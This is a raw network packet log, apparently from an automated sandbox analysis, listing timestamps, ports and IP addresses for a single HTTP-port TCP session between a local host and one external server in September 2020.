Sep 13, 2020 20:55:12.569185019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569210052 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569221020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569237947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569243908 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.569251060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569298983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569329977 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569339991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569350004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569360018 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569370031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569391966 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.569473028 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.591869116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.591986895 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.592036009 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592072010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592103004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592123032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592132092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592142105 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592154026 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592156887 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.592164040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592221022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592261076 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592272043 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592274904 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.592291117 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592325926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592334986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592348099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592364073 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592426062 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.592552900 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592623949 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.592756033 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592767000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592855930 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.592928886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592967033 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.592998028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593010902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593030930 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.593039036 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593056917 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593066931 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593075037 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593106031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593128920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593156099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593184948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593209028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593213081 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.593219995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593229055 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593238115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593246937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593256950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593275070 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593306065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593333960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593373060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593394995 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.593409061 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593434095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593462944 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593487978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593517065 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.593518019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593589067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593611002 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593630075 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.593631029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593657017 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593672991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593683958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593693972 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593703985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593722105 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593740940 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.593745947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593767881 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593777895 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593787909 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593799114 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593807936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593818903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593828917 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593838930 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593847990 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593858957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593868017 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593878984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593880892 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.593888998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593897104 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593908072 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593919039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593929052 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593940020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593950987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593961000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593971968 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593981981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.593991995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.594022989 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.594106913 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.615876913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.615891933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.615979910 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.616066933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616084099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616095066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616172075 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.616255045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616275072 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616301060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616324902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616368055 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616398096 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616435051 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.616456032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616503000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616518974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616539001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616554022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616569996 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616580009 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616590023 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.616595984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616607904 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616620064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616647959 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616683006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616693974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616707087 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616712093 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.616730928 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616753101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616770029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616780996 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616791010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616801023 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616811991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616821051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616831064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616835117 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.616842031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616851091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616859913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616869926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.616950989 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.617758036 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.617830038 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.617851019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.617866993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.617901087 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.617938042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.617948055 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.617971897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618000031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618019104 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618050098 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.618071079 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618094921 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618122101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618141890 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618149996 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.618166924 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618184090 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618192911 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618211985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618232012 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618269920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618338108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618355036 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618369102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618379116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618396997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618408918 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.618421078 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618443966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618467093 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618486881 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618505001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618527889 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618549109 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618561029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618573904 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618590117 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618601084 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618618011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618629932 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618654966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618668079 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.618676901 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618695974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618720055 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618736982 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618752003 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618762016 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.618771076 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618782043 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618796110 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618808031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618824005 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618834019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618844032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618853092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618870974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618880987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618885040 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.618891001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618900061 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618916988 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618933916 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618943930 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618962049 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618972063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.618995905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619008064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619012117 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.619033098 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619055986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619080067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619103909 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619103909 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.619127989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619152069 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619177103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619199991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619206905 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.619224072 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619246960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619271040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619296074 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619329929 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619343996 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619369984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619374037 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.619407892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619442940 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619472980 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619494915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619558096 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619573116 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.619585991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619596004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619605064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619616032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619628906 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619683981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619714022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619724989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619736910 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619739056 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.619748116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619756937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619770050 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619793892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619813919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619836092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619853020 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.619853020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619865894 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619887114 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619896889 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619906902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619916916 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619930029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619945049 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619955063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619965076 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619971037 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.619975090 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619983912 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.619992971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620002031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620012045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620022058 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620032072 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620042086 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620052099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620062113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620071888 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620081902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620091915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620101929 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620106936 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.620111942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620121002 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.620197058 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.639703989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.639868975 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.639897108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.640002012 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.640012980 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.640038967 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.640289068 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.641639948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641661882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641674995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641693115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641700983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641706944 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641714096 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641720057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641735077 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641741991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641752958 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.641921997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641949892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641978025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.641989946 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642004013 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642033100 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.642046928 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642105103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642129898 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642180920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642205954 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642219067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642235994 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642245054 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642261028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642344952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642366886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642383099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642395973 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642407894 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642421007 CEST	80	49723	47.245.136.23	192.168.2.3
